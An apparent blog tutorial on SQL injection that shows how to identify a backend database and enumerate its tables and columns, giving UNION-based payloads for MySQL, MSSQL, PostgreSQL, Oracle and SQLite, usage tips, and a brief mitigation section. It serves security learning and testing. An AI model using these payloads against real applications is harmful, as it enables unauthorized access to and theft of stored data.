๐ How to Identify Different Databases and Extract Schema Info via SQL Injection
โ ๏ธ This guide is for educational purposes only. Always perform security testing with explicit authorization. Unauthorized access or exploitation of systems is illegal.
๐งญ Table of Contents
- Introduction
- Identify Database Type Using Syntax
- Determine Database Version
- List All Tables in the Database
- List Columns in a Specific Table
- Examples for Major DBMS Types
- Tips & Best Practices
- Mitigation: How to Prevent SQLi
1๏ธโฃ Introduction
SQL injection (SQLi) allows attackers to manipulate database queries to extract, modify, or delete data. A critical first step in exploiting SQLi is identifying:
- The type of database (e.g., MySQL, PostgreSQL, MSSQL, Oracle)
- The version of the database
- The structure of the database โ tables and columns
This document walks you through how to use database-specific syntax to identify different databases and extract their schema details using SQL injection techniques.
2๏ธโฃ Identify Database Type Using Syntax
Each database system has unique syntax and built-in functions. You can exploit these differences to determine the type of backend database.
๐ก Common Techniques
โ Try Simple Queries in Injection Point:
Use payloads like:
' AND (SELECT 'a')='a
If it doesn't cause an error, it might be MySQL.
Try:
' AND 1=CAST(VERSION() AS INT)--
If this returns an error, but @@version works, itโs likely MySQL or MSSQL.
3๏ธโฃ Determine Database Version
Knowing the version helps in crafting further exploits, as certain versions may have known vulnerabilities.
๐ Common Queries by DBMS
| Database | Query to Get Version |
|---|---|
| MySQL / MSSQL | SELECT @@version |
| PostgreSQL | SELECT version() |
| Oracle | SELECT * FROM v$version |
| SQLite | SELECT sqlite_version() |
๐งช Example Payload (UNION-Based SQLi):
' UNION SELECT @@version--
๐ Sample Output for MSSQL:
Microsoft SQL Server 2019 - 15.0.2000.5 (X64)
Jun 15 2021 10:47:43
Copyright (c) Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard
๐ From this output:
- It's Microsoft SQL Server
- Version is 15.0.2000.5
- Running on Windows Server 2019
4๏ธโฃ List All Tables in the Database
Once the DBMS is identified, you can query metadata views like information_schema.tables to list all tables.
โ Note: Oracle does not support
information_schema. Instead, it uses system views likeall_tables.
๐งฎ Supported Databases:
- MySQL
- PostgreSQL
- Microsoft SQL Server
๐ SQL Query:
SELECT table_name FROM information_schema.tables WHERE table_type = 'BASE TABLE'
๐งช Example Payload:
' UNION SELECT table_name FROM information_schema.tables WHERE table_type = 'BASE TABLE'--
๐งพ Sample Output:
| TABLE_NAME |
|---|
| Users |
| Products |
| Orders |
๐ You now know there are three tables: Users, Products, and Orders.
5๏ธโฃ List Columns in a Specific Table
After identifying table names, you can retrieve column names and types to understand what data is stored.
๐ SQL Query:
SELECT column_name, data_type FROM information_schema.columns WHERE table_name = 'Users'
๐งช Example Payload:
' UNION SELECT column_name, data_type FROM information_schema.columns WHERE table_name = 'Users'--
๐งพ Sample Output:
| COLUMN_NAME | DATA_TYPE |
|---|---|
| UserId | int |
| Username | varchar |
| varchar | |
| Password | varchar |
๐ The Users table contains four columns:
-
UserId(integer) -
Username(string) -
Email(string) -
Password(string)
6๏ธโฃ Examples for Major DBMS Types
๐ข MySQL / Microsoft SQL Server
Get Version:
' UNION SELECT @@version--
List Tables:
' UNION SELECT table_name FROM information_schema.tables WHERE table_type = 'BASE TABLE'--
List Columns:
' UNION SELECT column_name, data_type FROM information_schema.columns WHERE table_name = 'Users'--
๐ฃ PostgreSQL
Get Version:
' UNION SELECT version()--
List Tables:
' UNION SELECT relname FROM pg_class WHERE relkind='r' AND relname NOT LIKE 'pg_%' AND relname NOT LIKE 'sql_%' ORDER BY relname;--
List Columns:
' UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'users'--
๐ก Oracle
Oracle does not support information_schema.
Get Version:
' UNION SELECT banner FROM v$version WHERE rownum = 1--
List Tables:
' UNION SELECT table_name FROM all_tables--
List Columns:
' UNION SELECT column_name FROM all_cons_columns WHERE table_name = 'USERS'--
โ ๏ธ Oracle table/column names are usually in uppercase, so match accordingly.
๐ค SQLite
Get Version:
' UNION SELECT sqlite_version()--
List Tables:
' UNION SELECT name FROM sqlite_master WHERE type='table'--
List Columns:
' UNION SELECT sql FROM sqlite_master WHERE name='users'--
This will return the full CREATE TABLE statement from which you can extract column names.
7๏ธโฃ Tips & Best Practices
- ๐ If one payload fails, try another.
- ๐ฆ Use tools like SQLMap to automate schema extraction.
- ๐งฉ Blind SQL injection requires time-based or conditional responses.
- ๐ต๏ธโโ๏ธ Look for verbose error messages โ they often leak DBMS info.
- ๐ Use
ORDER BY,UNION SELECT NULL,NULL,...to find number of columns if schema extraction fails initially.
8๏ธโฃ Mitigation: How to Prevent SQLi
To protect your application from SQL injection:
- โ Use parameterized queries (prepared statements)
- โ Validate and sanitize all user inputs
- โ Use ORM libraries (like SQLAlchemy, Hibernate)
- ๐ก๏ธ Apply the principle of least privilege to DB users
- ๐งน Regularly scan for vulnerabilities using tools like OWASP ZAP or Burp Suite
๐ Final Thoughts
Understanding how to identify the database type and extract its structure is essential for both ethical hackers and developers. Whether you're testing your own application or improving your penetration testing skills, knowing how to enumerate database schemas gives you powerful insight into potential vulnerabilities.
For more resources, visit:
๐ Stay secure, stay informed, and hack responsibly!
Made with โค๏ธ by your Onyxwizard.
Top comments (1)
Some comments may only be visible to logged-in visitors. Sign in to view all comments.